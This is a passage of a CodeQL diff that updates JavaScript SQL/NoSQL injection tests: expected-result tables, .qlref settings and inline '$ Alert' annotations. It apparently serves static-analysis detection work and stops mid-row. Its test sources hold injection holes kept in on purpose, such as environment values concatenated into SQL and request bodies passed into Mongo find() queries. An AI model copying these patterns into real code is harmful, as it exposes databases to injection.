@@ -1,12 +1,12 @@ +#select +| test.js:7:14:7:61 | 'SELECT ... + temp | test.js:4:12:4:22 | process.env | test.js:7:14:7:61 | 'SELECT ... + temp | This query string depends on a $@. | test.js:4:12:4:22 | process.env | user-provided value | +edges +| test.js:4:5:4:29 | temp | test.js:7:58:7:61 | temp | provenance | | +| test.js:4:12:4:22 | process.env | test.js:4:5:4:29 | temp | provenance | | +| test.js:7:58:7:61 | temp | test.js:7:14:7:61 | 'SELECT ... + temp | provenance | | nodes | test.js:4:5:4:29 | temp | semmle.label | temp | | test.js:4:12:4:22 | process.env | semmle.label | process.env | | test.js:7:14:7:61 | 'SELECT ... + temp | semmle.label | 'SELECT ... + temp | | test.js:7:58:7:61 | temp | semmle.label | temp | -edges -| test.js:4:5:4:29 | temp | test.js:7:58:7:61 | temp | provenance | | -| test.js:4:12:4:22 | process.env | test.js:4:5:4:29 | temp | provenance | | -| test.js:7:58:7:61 | temp | test.js:7:14:7:61 | 'SELECT ... + temp | provenance | | subpaths -#select -| test.js:7:14:7:61 | 'SELECT ... + temp | test.js:4:12:4:22 | process.env | test.js:7:14:7:61 | 'SELECT ... + temp | This query string depends on a $@. | test.js:4:12:4:22 | process.env | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js index 42b11b27b6eb..517a492e656b 100644 
--- a/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js +++ b/javascript/ql/test/query-tests/Security/CWE-089/local-threat-source/test.js @@ -1,9 +1,9 @@ const mysql = require('mysql'); const pool = mysql.createPool(getConfig()); -let temp = process.env['foo']; +let temp = process.env['foo']; // $ Source pool.getConnection(function(err, connection) { connection.query({ - sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // NOT OK + sql: 'SELECT * FROM `books` WHERE `author` = ' + temp, // $ Alert }, function(error, results, fields) {}); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected index 5446a4da85a5..b0ae2737b003 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.expected 
@@ -1,3 +1,20 @@ +#select +| typedClient.ts:14:24:14:32 | { id: v } | typedClient.ts:13:22:13:29 | req.body | typedClient.ts:14:24:14:32 | { id: v } | This query object depends on a $@. | typedClient.ts:13:22:13:29 | req.body | user-provided value | +| typedClient.ts:22:27:22:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:22:27:22:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | +| typedClient.ts:23:27:23:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:23:27:23:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | +edges +| typedClient.ts:13:7:13:32 | v | typedClient.ts:14:30:14:30 | v | provenance | | +| typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | typedClient.ts:13:7:13:32 | v | provenance | | +| typedClient.ts:13:22:13:29 | req.body | typedClient.ts:13:22:13:31 | req.body.x | provenance | Config | +| typedClient.ts:13:22:13:31 | req.body.x | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | provenance | Config | +| typedClient.ts:14:30:14:30 | v | typedClient.ts:14:24:14:32 | { id: v } | provenance | Config | +| typedClient.ts:21:7:21:32 | v | typedClient.ts:22:33:22:33 | v | provenance | | +| typedClient.ts:21:7:21:32 | v | typedClient.ts:23:33:23:33 | v | provenance | | +| typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | typedClient.ts:21:7:21:32 | v | provenance | | +| typedClient.ts:21:22:21:29 | req.body | typedClient.ts:21:22:21:31 | req.body.x | provenance | Config | +| typedClient.ts:21:22:21:31 | req.body.x | typedClient.ts:21:11:21:32 | JSON.pa ... 
body.x) | provenance | Config | +| typedClient.ts:22:33:22:33 | v | typedClient.ts:22:27:22:35 | { id: v } | provenance | Config | +| typedClient.ts:23:33:23:33 | v | typedClient.ts:23:27:23:35 | { id: v } | provenance | Config | nodes | typedClient.ts:13:7:13:32 | v | semmle.label | v | | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | semmle.label | JSON.pa ... body.x) | 
@@ -13,21 +30,4 @@ nodes | typedClient.ts:22:33:22:33 | v | semmle.label | v | | typedClient.ts:23:27:23:35 | { id: v } | semmle.label | { id: v } | | typedClient.ts:23:33:23:33 | v | semmle.label | v | -edges -| typedClient.ts:13:7:13:32 | v | typedClient.ts:14:30:14:30 | v | provenance | | -| typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | typedClient.ts:13:7:13:32 | v | provenance | | -| typedClient.ts:13:22:13:29 | req.body | typedClient.ts:13:22:13:31 | req.body.x | provenance | Config | -| typedClient.ts:13:22:13:31 | req.body.x | typedClient.ts:13:11:13:32 | JSON.pa ... body.x) | provenance | Config | -| typedClient.ts:14:30:14:30 | v | typedClient.ts:14:24:14:32 | { id: v } | provenance | Config | -| typedClient.ts:21:7:21:32 | v | typedClient.ts:22:33:22:33 | v | provenance | | -| typedClient.ts:21:7:21:32 | v | typedClient.ts:23:33:23:33 | v | provenance | | -| typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | typedClient.ts:21:7:21:32 | v | provenance | | -| typedClient.ts:21:22:21:29 | req.body | typedClient.ts:21:22:21:31 | req.body.x | provenance | Config | -| typedClient.ts:21:22:21:31 | req.body.x | typedClient.ts:21:11:21:32 | JSON.pa ... body.x) | provenance | Config | -| typedClient.ts:22:33:22:33 | v | typedClient.ts:22:27:22:35 | { id: v } | provenance | Config | -| typedClient.ts:23:33:23:33 | v | typedClient.ts:23:27:23:35 | { id: v } | provenance | Config | subpaths -#select -| typedClient.ts:14:24:14:32 | { id: v } | typedClient.ts:13:22:13:29 | req.body | typedClient.ts:14:24:14:32 | { id: v } | This query object depends on a $@. | typedClient.ts:13:22:13:29 | req.body | user-provided value | -| typedClient.ts:22:27:22:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:22:27:22:35 | { id: v } | This query object depends on a $@. 
| typedClient.ts:21:22:21:29 | req.body | user-provided value | -| typedClient.ts:23:27:23:35 | { id: v } | typedClient.ts:21:22:21:29 | req.body | typedClient.ts:23:27:23:35 | { id: v } | This query object depends on a $@. | typedClient.ts:21:22:21:29 | req.body | user-provided value | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref index d1d02cbe8d37..444c0e5f46aa 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/SqlInjection.qlref @@ -1 +1,2 @@ -Security/CWE-089/SqlInjection.ql +query: Security/CWE-089/SqlInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts index 5741f61fad64..4efc810a6a32 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts +++ b/javascript/ql/test/query-tests/Security/CWE-089/typed/typedClient.ts @@ -10,15 +10,15 @@ let app = express(); app.use(bodyParser.json()); app.post("/find", (req, res) => { - let v = JSON.parse(req.body.x); - getCollection().find({ id: v }); // NOT OK + let v = JSON.parse(req.body.x); // $ Source + getCollection().find({ id: v }); // $ Alert }); import * as mongoose from "mongoose"; declare function getMongooseModel(): mongoose.Model; declare function getMongooseQuery(): mongoose.Query; app.post("/find", (req, res) => { - let v = JSON.parse(req.body.x); - getMongooseModel().find({ id: v }); // NOT OK - getMongooseQuery().find({ id: v }); // NOT OK + let v = JSON.parse(req.body.x); // $ Source + getMongooseModel().find({ id: v }); // $ Alert + getMongooseQuery().find({ id: v }); // $ Alert }); 
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644 index e69de29bb2d1..000000000000 diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644 index 9c721994d677..000000000000 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql +++ /dev/null @@ -1,4 +0,0 @@ -import javascript -deprecated import utils.test.ConsistencyChecking -import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection -import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected index 0f95e5464fb9..52ce3076ba70 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/DatabaseAccesses.expected @@ -1,4 +1,4 @@ -| html-sanitizer.js:15:5:17:5 | connect ... K\\n ) | +| html-sanitizer.js:15:5:17:5 | connect ... t\\n ) | | json-schema-validator.js:27:13:27:27 | doc.find(query) | | json-schema-validator.js:30:13:30:27 | doc.find(query) | | json-schema-validator.js:33:13:33:27 | doc.find(query) | 
@@ -7,43 +7,43 @@ | json-schema-validator.js:55:13:55:27 | doc.find(query) | | json-schema-validator.js:59:13:59:27 | doc.find(query) | | json-schema-validator.js:61:13:61:27 | doc.find(query) | -| marsdb-flow-to.js:14:3:14:41 | db.myDo ... => {}) | -| marsdb.js:16:3:16:36 | doc.fin ... => {}) | -| minimongo.js:18:3:18:17 | doc.find(query) | -| mongodb.js:18:7:18:21 | doc.find(query) | -| mongodb.js:21:7:21:48 | doc.fin ... itle }) | -| mongodb.js:24:7:24:53 | doc.fin ... r(1) }) | -| mongodb.js:29:9:29:34 | doc.fin ... itle }) | -| mongodb.js:32:9:32:46 | doc.fin ... tle) }) | -| mongodb.js:43:7:43:21 | doc.find(query) | -| mongodb.js:54:7:54:21 | doc.find(query) | -| mongodb.js:65:3:65:17 | doc.find(query) | -| mongodb.js:73:5:77:27 | client\\n ... tag }) | -| mongodb.js:81:3:85:25 | importe ... tag }) | -| mongodb.js:98:5:98:19 | doc.find(query) | -| mongodb.js:112:5:112:19 | doc.find(query) | +| marsdb-flow-to.js:13:3:13:41 | db.myDo ... => {}) | +| marsdb.js:15:3:15:36 | doc.fin ... => {}) | +| minimongo.js:17:3:17:17 | doc.find(query) | +| mongodb.js:17:7:17:21 | doc.find(query) | +| mongodb.js:20:7:20:48 | doc.fin ... itle }) | +| mongodb.js:23:7:23:53 | doc.fin ... r(1) }) | +| mongodb.js:28:9:28:34 | doc.fin ... itle }) | +| mongodb.js:30:9:30:46 | doc.fin ... tle) }) | +| mongodb.js:41:7:41:21 | doc.find(query) | +| mongodb.js:51:7:51:21 | doc.find(query) | +| mongodb.js:61:3:61:17 | doc.find(query) | +| mongodb.js:69:5:72:27 | client\\n ... tag }) | +| mongodb.js:76:3:79:25 | importe ... tag }) | +| mongodb.js:92:5:92:19 | doc.find(query) | +| mongodb.js:105:5:105:19 | doc.find(query) | | mongodb_bodySafe.js:18:7:18:21 | doc.find(query) | -| mongodb_bodySafe.js:29:7:29:21 | doc.find(query) | -| mongoose.js:63:2:63:34 | Documen ... then(X) | -| mongoose.js:65:2:65:51 | Documen ... on(){}) | -| mongoose.js:67:2:68:27 | new Mon ... on(){}) | -| mongoose.js:71:2:78:9 | Documen ... .exec() | -| mongoose.js:85:2:85:52 | Documen ... 
query)) | -| mongoose.js:86:2:86:52 | Documen ... query)) | -| mongoose.js:87:2:87:57 | Documen ... query)) | -| mongoose.js:88:2:88:57 | Documen ... query)) | -| mongoose.js:89:2:89:52 | Documen ... query)) | -| mongoose.js:90:2:90:55 | Documen ... query)) | -| mongoose.js:92:2:92:52 | Documen ... query)) | -| mongoose.js:93:2:93:49 | Documen ... query)) | -| mongoose.js:94:2:94:57 | Documen ... query)) | -| mongoose.js:95:2:95:54 | Documen ... query)) | -| mongoose.js:96:2:96:52 | Documen ... query)) | -| mongoose.js:97:2:97:52 | Documen ... query)) | -| mongoose.js:99:2:99:50 | Documen ... query)) | -| mongoose.js:113:2:113:53 | Documen ... () { }) | -| mongoose.js:134:3:134:52 | Documen ... on(){}) | -| mongoose.js:136:3:136:52 | Documen ... on(){}) | +| mongodb_bodySafe.js:28:7:28:21 | doc.find(query) | +| mongoose.js:49:2:49:34 | Documen ... then(X) | +| mongoose.js:51:2:51:51 | Documen ... on(){}) | +| mongoose.js:53:2:54:27 | new Mon ... on(){}) | +| mongoose.js:57:2:64:9 | Documen ... .exec() | +| mongoose.js:71:2:71:52 | Documen ... query)) | +| mongoose.js:72:2:72:52 | Documen ... query)) | +| mongoose.js:73:2:73:57 | Documen ... query)) | +| mongoose.js:74:2:74:57 | Documen ... query)) | +| mongoose.js:75:2:75:52 | Documen ... query)) | +| mongoose.js:76:2:76:55 | Documen ... query)) | +| mongoose.js:78:2:78:52 | Documen ... query)) | +| mongoose.js:79:2:79:49 | Documen ... query)) | +| mongoose.js:80:2:80:57 | Documen ... query)) | +| mongoose.js:81:2:81:54 | Documen ... query)) | +| mongoose.js:82:2:82:52 | Documen ... query)) | +| mongoose.js:83:2:83:52 | Documen ... query)) | +| mongoose.js:85:2:85:50 | Documen ... query)) | +| mongoose.js:99:2:99:53 | Documen ... () { }) | +| mongoose.js:120:3:120:52 | Documen ... on(){}) | +| mongoose.js:122:3:122:52 | Documen ... on(){}) | | mysql.js:8:9:11:47 | connect ... ds) {}) | | mysql.js:14:9:16:47 | connect ... ds) {}) | | mysql.js:19:9:20:48 | connect ... ds) {}) | 
@@ -59,10 +59,10 @@ | pg-promise.js:17:3:17:21 | db.oneOrNone(query) | | pg-promise.js:18:3:18:17 | db.query(query) | | pg-promise.js:19:3:19:18 | db.result(query) | -| pg-promise.js:21:3:23:4 | db.one( ... OK\\n }) | -| pg-promise.js:24:3:27:4 | db.one( ... OK\\n }) | +| pg-promise.js:21:3:23:4 | db.one( ... rt\\n }) | +| pg-promise.js:24:3:27:4 | db.one( ... d,\\n }) | | pg-promise.js:28:3:31:4 | db.one( ... er\\n }) | -| pg-promise.js:32:3:35:4 | db.one( ... OK\\n }) | +| pg-promise.js:32:3:35:4 | db.one( ... rt\\n }) | | pg-promise.js:36:3:43:4 | db.one( ... ]\\n }) | | pg-promise.js:44:3:50:4 | db.one( ... }\\n }) | | pg-promise.js:51:3:58:4 | db.one( ... }\\n }) | @@ -88,7 +88,7 @@ | redis.js:49:18:49:47 | client. ... value") | | socketio.js:11:5:11:54 | db.run( ... ndle}`) | | tst2.js:7:3:7:62 | sql.que ... ms.id}` | -| tst2.js:9:3:9:85 | new sql ... + "'") | +| tst2.js:8:3:8:85 | new sql ... + "'") | | tst3.js:9:3:11:4 | pool.qu ... ts\\n }) | | tst3.js:16:3:18:4 | pool.qu ... ts\\n }) | | tst4.js:8:3:8:67 | db.get( ... + '"') | diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected index 5ae279288cf8..7ac39529dd60 100644 --- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected +++ b/javascript/ql/test/query-tests/Security/CWE-089/untyped/SqlInjection.expected 
@@ -1,38 +1,509 @@ +#select +| graphql.js:9:34:19:5 | `\\n ... }\\n ` | graphql.js:8:16:8:28 | req.params.id | graphql.js:9:34:19:5 | `\\n ... }\\n ` | This query string depends on a $@. | graphql.js:8:16:8:28 | req.params.id | user-provided value | +| graphql.js:26:30:26:40 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:26:30:26:40 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:29:32:29:42 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:29:32:29:42 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:32:18:32:28 | `foo ${id}` | graphql.js:25:16:25:28 | req.params.id | graphql.js:32:18:32:28 | `foo ${id}` | This query string depends on a $@. | graphql.js:25:16:25:28 | req.params.id | user-provided value | +| graphql.js:43:14:43:24 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:43:14:43:24 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:47:44:47:54 | `foo ${id}` | graphql.js:38:16:38:28 | req.params.id | graphql.js:47:44:47:54 | `foo ${id}` | This query string depends on a $@. | graphql.js:38:16:38:28 | req.params.id | user-provided value | +| graphql.js:55:39:55:49 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:55:39:55:49 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:57:66:57:76 | `foo ${id}` | graphql.js:54:16:54:28 | req.params.id | graphql.js:57:66:57:76 | `foo ${id}` | This query string depends on a $@. | graphql.js:54:16:54:28 | req.params.id | user-provided value | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | graphql.js:73:14:73:25 | req.query.id | graphql.js:74:46:74:64 | "{ foo" + id + " }" | This query string depends on a $@. 
| graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:82:14:88:8 | `{\\n ... }` | graphql.js:73:14:73:25 | req.query.id | graphql.js:82:14:88:8 | `{\\n ... }` | This query string depends on a $@. | graphql.js:73:14:73:25 | req.query.id | user-provided value | +| graphql.js:118:38:118:48 | `foo ${id}` | graphql.js:117:16:117:28 | req.params.id | graphql.js:118:38:118:48 | `foo ${id}` | This query string depends on a $@. | graphql.js:117:16:117:28 | req.params.id | user-provided value | +| html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | html-sanitizer.js:13:39:13:44 | param1 | html-sanitizer.js:16:9:16:59 | `SELECT ... param1 | This query string depends on a $@. | html-sanitizer.js:13:39:13:44 | param1 | user-provided value | +| json-schema-validator.js:33:22:33:26 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:33:22:33:26 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | +| json-schema-validator.js:35:18:35:22 | query | json-schema-validator.js:25:34:25:47 | req.query.data | json-schema-validator.js:35:18:35:22 | query | This query object depends on a $@. | json-schema-validator.js:25:34:25:47 | req.query.data | user-provided value | +| json-schema-validator.js:55:22:55:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:55:22:55:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| json-schema-validator.js:59:22:59:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:59:22:59:26 | query | This query object depends on a $@. 
| json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| json-schema-validator.js:61:22:61:26 | query | json-schema-validator.js:50:34:50:47 | req.query.data | json-schema-validator.js:61:22:61:26 | query | This query object depends on a $@. | json-schema-validator.js:50:34:50:47 | req.query.data | user-provided value | +| koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | koarouter.js:5:13:5:19 | version | koarouter.js:17:27:17:77 | `SELECT ... nd ')}` | This query string depends on a $@. | koarouter.js:5:13:5:19 | version | user-provided value | +| ldap.js:28:30:28:34 | opts1 | ldap.js:20:21:20:27 | req.url | ldap.js:28:30:28:34 | opts1 | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:32:5:32:61 | { filte ... e}))` } | ldap.js:20:21:20:27 | req.url | ldap.js:32:5:32:61 | { filte ... e}))` } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:66:30:66:53 | { filte ... ilter } | ldap.js:20:21:20:27 | req.url | ldap.js:66:30:66:53 | { filte ... ilter } | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| ldap.js:68:27:68:42 | `cn=${username}` | ldap.js:20:21:20:27 | req.url | ldap.js:68:27:68:42 | `cn=${username}` | This query string depends on a $@. | ldap.js:20:21:20:27 | req.url | user-provided value | +| marsdb-flow-to.js:13:17:13:21 | query | marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:13:17:13:21 | query | This query object depends on a $@. | marsdb-flow-to.js:11:17:11:24 | req.body | user-provided value | +| marsdb.js:15:12:15:16 | query | marsdb.js:13:17:13:24 | req.body | marsdb.js:15:12:15:16 | query | This query object depends on a $@. | marsdb.js:13:17:13:24 | req.body | user-provided value | +| minimongo.js:17:12:17:16 | query | minimongo.js:15:17:15:24 | req.body | minimongo.js:17:12:17:16 | query | This query object depends on a $@. 
| minimongo.js:15:17:15:24 | req.body | user-provided value | +| mongodb.js:17:16:17:20 | query | mongodb.js:13:19:13:26 | req.body | mongodb.js:17:16:17:20 | query | This query object depends on a $@. | mongodb.js:13:19:13:26 | req.body | user-provided value | +| mongodb.js:30:18:30:45 | { title ... itle) } | mongodb.js:25:19:25:26 | req.body | mongodb.js:30:18:30:45 | { title ... itle) } | This query object depends on a $@. | mongodb.js:25:19:25:26 | req.body | user-provided value | +| mongodb.js:51:16:51:20 | query | mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | This query object depends on a $@. | mongodb.js:47:19:47:33 | req.query.title | user-provided value | +| mongodb.js:61:12:61:16 | query | mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | This query object depends on a $@. | mongodb.js:57:16:57:30 | req.query.title | user-provided value | +| mongodb.js:72:14:72:26 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:72:14:72:26 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:79:12:79:24 | { tags: tag } | mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:79:12:79:24 | { tags: tag } | This query object depends on a $@. | mongodb.js:66:13:66:25 | req.query.tag | user-provided value | +| mongodb.js:105:14:105:18 | query | mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | This query object depends on a $@. | mongodb.js:101:17:101:29 | queries.title | user-provided value | +| mongodb_bodySafe.js:28:16:28:20 | query | mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | This query object depends on a $@. | mongodb_bodySafe.js:24:19:24:33 | req.query.title | user-provided value | +| mongoose.js:23:21:23:27 | [query] | mongoose.js:21:16:21:23 | req.body | mongoose.js:23:21:23:27 | [query] | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:25:17:25:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:25:17:25:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:27:22:27:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:27:22:27:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:29:21:29:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:29:21:29:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:31:28:31:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:31:28:31:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:33:16:33:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:33:16:33:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:35:19:35:23 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:35:19:35:23 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:37:28:37:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:37:28:37:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:39:28:39:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:39:28:39:32 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:41:28:41:32 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:41:28:41:32 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:43:22:43:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:43:22:43:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:45:18:45:22 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:45:18:45:22 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:47:22:47:26 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:47:22:47:26 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:49:21:49:25 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:49:21:49:25 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:51:32:51:36 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:51:32:51:36 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:53:27:53:31 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:53:27:53:31 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:54:8:54:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:54:8:54:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:57:17:57:21 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:57:17:57:21 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:58:10:58:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:58:10:58:14 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:59:8:59:12 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:59:8:59:12 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:60:7:60:11 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:60:7:60:11 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:61:16:61:20 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:61:16:61:20 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:63:10:63:14 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:63:10:63:14 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:68:46:68:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:68:46:68:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:69:47:69:51 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:69:47:69:51 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:71:46:71:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:71:46:71:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:73:51:73:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:73:51:73:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:75:46:75:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:75:46:75:50 | query | This query object depends on a $@. 
| mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:78:46:78:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:78:46:78:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:80:51:80:55 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:80:51:80:55 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:82:46:82:50 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:82:46:82:50 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:97:14:97:18 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:97:14:97:18 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:99:31:99:35 | query | mongoose.js:21:16:21:23 | req.body | mongoose.js:99:31:99:35 | query | This query object depends on a $@. | mongoose.js:21:16:21:23 | req.body | user-provided value | +| mongoose.js:102:22:102:25 | cond | mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:102:22:102:25 | cond | This query object depends on a $@. | mongoose.js:101:32:101:45 | 